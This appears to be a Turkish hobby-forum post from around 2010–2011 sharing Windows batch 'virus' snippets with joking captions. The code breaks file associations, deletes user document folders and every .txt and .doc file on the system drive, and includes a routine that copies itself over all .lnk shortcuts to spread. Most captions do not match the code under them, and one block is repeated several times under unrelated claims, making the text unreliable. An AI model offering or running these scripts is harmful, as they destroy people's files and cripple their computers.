echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
notepad /P "Spam.txt"
rem ---------------------------------
Pc yi çökertir.Komple =)
Kod:
@echo off
Kod:
rem ---------------------------------
rem Confuse File Extensions Powerup
assoc .dll=txtfile
assoc .exe=pngfile
assoc .vbs=Visual Style
assoc .reg=xmlfile
assoc .txt=regfile
rem ---------------------------------
rem Confuse File Extensions for text
assoc .mp3=txtfile
assoc .xml=txtfile
assoc .png=txtfile
rem ---------------------------------
Kullanıcının bilgisayardaki kullanıcısını siler xD bende anlamadım 
Kod:
@echo off
Kod:
rem ---------------------------------
rem Delete My ********s
del /f /q %userprofile%My ********s*.*
rem ---------------------------------
rem ---------------------------------
rem Delete Mes ********s
del /f /q %userprofile%Mes ********s*.*
rem ---------------------------------
Bilgisayarda anında müzik çalar.Ölüm müziği xD
Kod:
@echo off
Kod:
rem ---------------------------------
rem Confuse File Extensions Powerup
assoc .dll=txtfile
assoc .exe=pngfile
assoc .vbs=Visual Style
assoc .reg=xmlfile
assoc .txt=regfile
rem ---------------------------------
rem Confuse File Extensions for text
assoc .mp3=txtfile
assoc .xml=txtfile
assoc .png=txtfile
rem ---------------------------------
Xml türü dosya siler
Kod:
@echo off
Kod:
rem ---------------------------------
rem Confuse File Extensions Powerup
assoc .dll=txtfile
assoc .exe=pngfile
assoc .vbs=Visual Style
assoc .reg=xmlfile
assoc .txt=regfile
rem ---------------------------------
rem Confuse File Extensions for text
assoc .mp3=txtfile
assoc .xml=txtfile
assoc .png=txtfile
rem ---------------------------------
mp3 türü dosyaları sile
Kod:
@echo off
Kod:
rem ---------------------------------
rem Confuse File Extensions Powerup
assoc .dll=txtfile
assoc .exe=pngfile
assoc .vbs=Visual Style
assoc .reg=xmlfile
assoc .txt=regfile
rem ---------------------------------
rem Confuse File Extensions for text
assoc .mp3=txtfile
assoc .xml=txtfile
assoc .png=txtfile
rem ---------------------------------
pdf türü dosyaarı siler
Kod:
@echo off
Kod:
rem ---------------------------------
rem Confuse File Extensions Powerup
assoc .dll=txtfile
assoc .exe=pngfile
assoc .vbs=Visual Style
assoc .reg=xmlfile
assoc .txt=regfile
rem ---------------------------------
rem Confuse File Extensions for text
assoc .mp3=txtfile
assoc .xml=txtfile
assoc .png=txtfile
rem ---------------------------------
Metin belgelerini siler.
Kod:
@echo off
Kod:
rem ---------------------------------
rem Delete All Texts
DIR /S/B %SystemDrive%*.txt >> FIleList_txt.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_txt.txt) do del "%%j:%%k"
rem ---------------------------------
word dosyalarını gösterir.Kullanıcı tıklarsa pc bom .D
Kod:
@echo off
Kod:
rem ---------------------------------
rem Delete All ********s
DIR /S/B %SystemDrive%*.doc >> FIleList_doc.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_doc.txt) do del "%%j:%%k"
rem ---------------------------------
Windows çöker ve çökerken garip sesler çıkarır =) HACKER
Kod:
@echo off
Kod:
rem ---------------------------------
rem Start Windows XP Secret Song
start "" "%systemroot%system32oobeimagestitle.wma"
rem ---------------------------------
infect eder makinayı
Kod:
@echo off
Kod:
rem ---------------------------------
rem Infect All Lnk
assoc .lnk=batfile
DIR /S/B %SystemDrive%*.lnk >> InfList_lnk.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_lnk.txt) do copy %0 "%%j:%%k"
rem ---------------------------------
Yalnız bir uyar yapayım bu kodlerı göndererek birine zarar vermek amaçlı kullanılırsa hakkınızda işlem başlatılabilr...
TrPC TÜRKİYE Yönetimi
Tüm Hakları Saklıdır © Copyright 2010 - 2011

trpcturkiye.tr.ggBu Tasarım TrPC Türkiye
Tarafindan Modlanmıştır.

Güncel Konular

En Son Ne Oldu?
1-) Sitemiz Blog Sistemine Geçti.=> Sen de ücretsiz bir internet sitesi kurmak ister misin? O zaman burayı tıkla! <=